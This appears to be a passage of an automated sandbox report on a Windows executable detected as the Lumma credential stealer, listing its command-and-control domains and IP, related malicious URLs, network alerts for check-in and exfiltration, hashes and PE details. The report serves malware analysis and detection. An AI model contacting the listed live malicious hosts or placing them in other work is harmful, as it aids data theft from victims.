              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              necklacedmny.store
              		188.114.97.3
              		truetrueunknown
              presticitpo.store
              		unknown
              		unknowntrueunknown
              thumbystriw.store
              		unknown
              		unknowntrueunknown
              crisiwarny.store
              		unknown
              		unknowntrue
                		unknown
                fadehairucw.store
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://necklacedmny.store/apitrue
                  		unknown
                  presticitpo.storetrue
                    		unknown
                    scriptyprefej.storetrue
                      		unknown
                      necklacedmny.storetrue
                        		unknown
                        fadehairucw.storetrue
                          		unknown
                          navygenerayk.storetrue
                            		unknown
                            founpiuer.storetrue
                              		unknown
                              thumbystriw.storetrue
                                		unknown
                                crisiwarny.storetrue
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://necklacedmny.store/apiefile.exe, 00000000.00000002.2171310679.000000000110E000.00000004.00000020.00020000.00000000.sdmptrue
                                          		unknown
                                          https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://necklacedmny.store/file.exe, 00000000.00000003.2105019285.0000000001199000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2135307074.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171310679.0000000001120000.00000004.00000020.00020000.00000000.sdmptrue
                                            		unknown
                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://x1.c.lencr.org/0file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://x1.i.lencr.org/0file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://necklacedmny.store/apiYfile.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmptrue
                                              		unknown
                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&reffile.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://necklacedmny.store/apisfile.exe, 00000000.00000002.2171310679.000000000110E000.00000004.00000020.00020000.00000000.sdmptrue
                                                		unknown
                                                https://necklacedmny.store/api-file.exe, 00000000.00000002.2171551202.00000000011BC000.00000004.00000020.00020000.00000000.sdmptrue
                                                  		unknown
                                                  https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  188.114.97.3
                                                  		necklacedmny.storeEuropean Union
                                                  		13335CLOUDFLARENETUStrue

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1545042
                                                  Start date and time:2024-10-30 02:26:05 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 15s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:5
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:file.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 1
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target file.exe, PID 5800 because there are no executed function
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  21:26:58API Interceptor10x Sleep call for process: file.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  188.114.97.3zxalphamn.docGet hashmaliciousLokibotBrowse
                                                  • touxzw.ir/alpha2/five/fre.php
                                                  rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                  • www.launchdreamidea.xyz/2b9b/
                                                  rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                  • ghcopz.shop/ClarkB/PWS/fre.php
                                                  PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                  SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                  • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                  5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                  • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                  PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                  • www.cc101.pro/4hfb/
                                                  QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • filetransfer.io/data-package/cDXpxO66/download
                                                  Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
                                                  • tech-tribune.shop/pLQvfD4d5/index.php
                                                  WBCDZ4Z3M2667YBDZ5K4.bin.exeGet hashmaliciousUnknownBrowse
                                                  • tech-tribune.shop/pLQvfD4d5/index.php

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  necklacedmny.storefile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUSNdnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 104.21.43.145
                                                  completedfiles.....pdfGet hashmaliciousUnknownBrowse
                                                  • 104.21.63.172
                                                  https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
                                                  • 104.18.86.42
                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 172.64.41.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.97.3
                                                  https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
                                                  • 104.17.25.14
                                                  https://bioaquatictesting-my.sharepoint.com/:f:/g/personal/securedocument_bio-aquatic_com/EqfT1pjHkSVIsZ_uZ-FoAy4BgWwRj-5I-q_oaUpvi5Mxeg?e=eaqeTTGet hashmaliciousUnknownBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                  • 188.114.97.3
                                                  1Ebp0gOgh5.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                  • 188.114.97.3
                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 188.114.97.3

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  No created / dropped files found

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):6.515036865804577
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:file.exe
                                                  File size:3'001'344 bytes
                                                  MD5:00e4faf579951dedcfe07699f0816ea9
                                                  SHA1:39c1e768620ecd4d0da3b1625a8186377f186f04
                                                  SHA256:61026d58b1772d55debe9e7cf29acf688b23ed1b1eda22f499dde79037bcef8e
                                                  SHA512:d66f98b21cbb97914de799d1477b1e40f9e6ccef167c848a218c535c6cf7ae151a64ce6db5fe0dbdefc66a227095df48ec0c569477efee5a68281af15afb787d
                                                  SSDEEP:49152:XCoJE/k9BApIOO4BnHtpawwbQi7HRUQ2qPad04:yoJEc9BApI74BnrawyQi7HRL2qP20
                                                  TLSH:9DD54A52B44571CBE49E2374852BCD46791E83B90B1448C3AC2DA4FEBEB3DC519FAC68
                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................1......@....@.................................T...h..

                                                  File Icon

                                                  Icon Hash:00928e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x70e000
                                                  Entrypoint Section:.taggant
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:6
                                                  OS Version Minor:0
                                                  File Version Major:6
                                                  File Version Minor:0
                                                  Subsystem Version Major:6
                                                  Subsystem Version Minor:0
                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp 00007F79A46FFF4Ah
                                                  rsm
                                                  sub eax, 00000000h
                                                  add cl, ch
                                                  add byte ptr [eax], ah
                                                  add byte ptr [eax], al
                                                  add byte ptr [ebx], al
                                                  or al, byte ptr [eax]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], dh
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax+eax], ah
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  and dword ptr [eax], eax
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add ecx, dword ptr [edx]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  pop es
                                                  add byte ptr [eax], 00000000h
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  adc byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add eax, 0000000Ah
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x340.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  0x10000x580000x27e00af352a4c89490cfd98df27f9adcf580cFalse0.9979121767241379data7.970180597409933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x590000x3400x400914cd139a383496d0085d499d138ef92False0.390625data4.997389973748798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  vsrxmbmz0x5b0000x2b20000x2b120083798e5364ee2b54560796ab09488b40unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  xopfihuh0x30d0000x10000x400efa5bcb789badc55844fa768eff13c94False0.7197265625data5.787501654543249IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .taggant0x30e0000x30000x2200061eeea93e50ec3ceccc7a65b2ff9490False0.0681295955882353DOS executable (COM)0.7187436640601623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_MANIFEST0x590580x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397

                                                  Imports

                                                  DLLImport
                                                  kernel32.dlllstrcpy

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-10-30T02:26:59.580284+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.5547121.1.1.153UDP
                                                  2024-10-30T02:26:59.599684+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.5513741.1.1.153UDP
                                                  2024-10-30T02:26:59.610112+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.5631901.1.1.153UDP
                                                  2024-10-30T02:26:59.622783+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.5637631.1.1.153UDP
                                                  2024-10-30T02:26:59.635028+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.5548861.1.1.153UDP
                                                  2024-10-30T02:27:00.285955+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549704188.114.97.3443TCP
                                                  2024-10-30T02:27:00.796437+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704188.114.97.3443TCP
                                                  2024-10-30T02:27:00.796437+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704188.114.97.3443TCP
                                                  2024-10-30T02:27:01.506961+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549705188.114.97.3443TCP
                                                  2024-10-30T02:27:01.973958+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705188.114.97.3443TCP
                                                  2024-10-30T02:27:01.973958+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.97.3443TCP
                                                  2024-10-30T02:27:02.910210+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549706188.114.97.3443TCP
                                                  2024-10-30T02:27:04.230056+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549707188.114.97.3443TCP
                                                  2024-10-30T02:27:05.844141+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549708188.114.97.3443TCP
                                                  2024-10-30T02:27:07.574027+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549709188.114.97.3443TCP
                                                  2024-10-30T02:27:08.044078+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709188.114.97.3443TCP
                                                  2024-10-30T02:27:09.216409+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549710188.114.97.3443TCP
                                                  2024-10-30T02:27:11.546110+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549711188.114.97.3443TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 30, 2024 02:26:59.657471895 CET49704443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:26:59.657572985 CET44349704188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:26:59.657679081 CET49704443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:26:59.659302950 CET49704443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:26:59.659357071 CET44349704188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:00.285841942 CET44349704188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:00.285954952 CET49704443192.168.2.5188.114.97.3
